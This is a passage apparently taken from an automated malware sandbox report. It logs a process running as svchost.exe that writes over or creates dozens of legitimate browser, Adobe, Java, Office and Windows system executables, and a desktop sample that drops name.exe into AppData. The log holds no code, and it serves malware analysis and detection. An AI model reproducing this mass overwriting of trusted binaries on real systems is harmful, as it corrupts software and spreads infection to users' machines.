              Source: C:\Windows\SysWOW64\svchost.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
              Source: C:\Windows\SysWOW64\svchost.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
              Source: C:\Windows\SysWOW64\svchost.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
              Source: C:\Windows\SysWOW64\svchost.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
              Source: C:\Windows\SysWOW64\svchost.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
              Source: C:\Windows\SysWOW64\svchost.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
              Source: C:\Windows\SysWOW64\svchost.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
              Source: C:\Windows\SysWOW64\svchost.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
              Source: C:\Windows\SysWOW64\svchost.exe, File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
              Source: C:\Windows\SysWOW64\svchost.exe, File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
              Source: C:\Windows\SysWOW64\svchost.exe, File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\sppsvc.exe
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeFile created: C:\Users\user\AppData\Local\directory\name.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\sppsvc.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
